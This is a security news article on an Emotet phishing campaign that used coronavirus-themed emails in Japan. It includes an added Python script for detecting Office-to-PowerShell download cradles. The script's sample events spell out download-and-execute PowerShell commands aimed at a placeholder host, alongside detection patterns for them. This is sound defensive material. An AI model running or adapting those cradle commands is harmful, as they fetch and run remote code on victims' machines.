- Crooks are exploiting public concern about the coronavirus to trick people into opening files that infect them with Emotet.
- The scammers have done a good job of imitating healthcare centers and national welfare service providers.
- Right now the targets are people in Japan, but as 2019-nCoV spreads, more countries are likely to receive such emails.
People in Japan report receiving emails that warn of coronavirus infection risks in their area, scaring them into opening attachments that deliver a malware payload. The actors are looking to exploit the fear around the outbreak of the 2019-nCoV virus, which has already infected almost eight thousand people and killed 170. Scammers are always ready to take advantage of any situation, be it tensions between the US and Iran, the tax season, or the Christmas holidays, and they are quick to build a narrowly themed campaign with all the bells and whistles the trickery requires.
— Cryptolaemus (@Cryptolaemus1) January 29, 2020
In the case of the coronavirus, the scammers have created documents that carry the letterheads of a Japanese disability welfare service provider and of various public health centers. The message claims that the document contains details on how to protect against coronavirus infection, but what the recipient actually gets is a file laced with malicious macros that, once enabled, run a PowerShell command to fetch and install the Emotet payload. Emotet is itself a loader, and the secondary malware seen in this campaign includes the TrickBot information stealer, which can in turn serve as a channel for ransomware.
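Detection logic for the infection chain just described, as an added example that is not part of the original article: a small Python triage of process-creation events that flags an Office host spawning a shell, decodes the UTF-16LE base64 blob that PowerShell's -EncodedCommand expects, and looks for download-cradle behaviour in the decoded script. The tab-separated event format, the paths, the example.invalid URL and all sample lines are constructed for illustration; they are not logs from the campaign.

```python
"""Triage process-creation events for the Office -> PowerShell download-cradle chain.

Constructed example: the event format and every sample line below are made up for
illustration; they are not logs from the campaign described in the article.
"""
import base64
import re

# Office hosts that have no business spawning a shell on a user workstation.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# -e / -ec / -enc / -EncodedCommand followed by the base64 blob (PowerShell accepts any prefix).
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Behaviours typical of a macro-launched download cradle, searched in the decoded
# script as well as in the raw command line.
INDICATORS = [
    ("download-cradle", re.compile(r"net\.webclient|downloadfile|downloadstring|invoke-webrequest|\biwr\b", re.I)),
    ("invoke-expression", re.compile(r"invoke-expression|\biex\b", re.I)),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("start-process", re.compile(r"start-process|\bsaps\b", re.I)),
]


def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it: UTF-16LE text, base64-wrapped."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the plaintext behind an -EncodedCommand argument, or None if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_event(line: str) -> dict:
    """Parse one tab-separated 'Key=Value' event line (constructed format, not Sysmon's XML)."""
    fields = {}
    for part in line.split("\t"):
        key, _, value = part.partition("=")  # split on the first '=' only; values may contain '='
        fields[key.strip()] = value.strip()
    return fields


def image_name(path: str) -> str:
    """Lower-case file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(line: str) -> dict:
    """Score one event. 'suspicious' is True for an Office host spawning a shell,
    or for any command line that shows two or more cradle behaviours."""
    ev = parse_event(line)
    parent = image_name(ev.get("ParentImage", ""))
    image = image_name(ev.get("Image", ""))
    cmdline = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    # Drop the base64 blob from the raw line so its random letters cannot trip the
    # patterns; the decoded script is searched instead.
    haystack = ENCODED_ARG.sub(" ", cmdline) + " " + (decoded or "")
    hits = [name for name, rx in INDICATORS if rx.search(haystack)]
    tags = []
    if parent in OFFICE_PARENTS and image in SHELLS:
        tags.append("office-spawned-shell")
    if decoded is not None:
        tags.append("encoded-command")
    return {
        "parent": parent,
        "image": image,
        "decoded": decoded,
        "indicators": tags + hits,
        "suspicious": "office-spawned-shell" in tags or len(hits) >= 2,
    }


# Constructed samples. The first mimics the chain in the article: Word runs a hidden,
# encoded PowerShell that downloads and starts a payload (placeholder URL).
CRADLE_SCRIPT = ("$u='http://example.invalid/update.exe';$p=$env:TEMP+'\\up.exe';"
                 "(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process $p")
ADMIN_SCRIPT = "Get-Process | Out-File C:\\t.txt"  # benign encoded use by an admin
RAW_CRADLE = "powershell -nop -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')|IEX\""
WORD = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    f"ParentImage={WORD}\tImage={PS}\tCommandLine=powershell -w hidden -enc {encode_for_powershell(CRADLE_SCRIPT)}",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\notepad.exe\tCommandLine=notepad.exe notes.txt",
    # Encoding alone must not raise an alert: admins use -enc legitimately.
    f"ParentImage=C:\\Windows\\System32\\cmd.exe\tImage={PS}\tCommandLine=powershell -enc {encode_for_powershell(ADMIN_SCRIPT)}",
    # Unencoded cradle with no Office parent: two or more behaviours, so still flagged.
    f"ParentImage=C:\\Windows\\System32\\cmd.exe\tImage={PS}\tCommandLine={RAW_CRADLE}",
]


def suspicious_events(lines) -> list:
    """Return the triage results for every event judged suspicious."""
    return [r for r in (triage(line) for line in lines) if r["suspicious"]]


if __name__ == "__main__":
    for r in suspicious_events(SAMPLE_EVENTS):
        print(f"{r['parent']} -> {r['image']}: {', '.join(r['indicators'])}")
        if r["decoded"]:
            print("  decoded:", r["decoded"])
```

Running the file prints the two flagged events with their decoded command. In a real deployment the same logic would run over Sysmon Event ID 1 or Windows 4688 records with command-line auditing enabled; the Office-parent rule is the high-confidence one, while the two-behaviour threshold is only a starting point that needs tuning against your own admin tooling.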
Many users report that the emails used in this campaign are sent from compromised accounts, and that the actors have put some effort into making them convincing. For example, the subject lines and document filenames are in Japanese, which raises the chance of a recipient being fooled. The body of the email has also been carefully crafted to look legitimate, and the footer carries the actual signature details of the health institute being spoofed. Because the messages come from genuine, compromised mailboxes, sender checks such as SPF and DKIM pass, so neither users nor mail filters can rely on those checks alone to spot this campaign.
As coronavirus infection rates continue to rise, we expect tailored Emotet distribution campaigns to multiply. In this case the actors started with Japan because the country is close to the source of the coronavirus; the next countries to face serious infection rates will also become targets. To stay safe from this type of campaign, keep macros disabled in your office suite (in Microsoft Office, the Trust Center option "Disable all macros without notification", or the policy that blocks macros in files downloaded from the internet), and never enable them just to see what an attachment contains: the "Enable Content" prompt is exactly what the malicious document is built to make you click. Treat any unsolicited email message as a potential risk. Finally, important official warnings from national agencies are not distributed as email attachments; they are published on official web portals and communicated through the media, so verify any such warning there rather than in the attachment.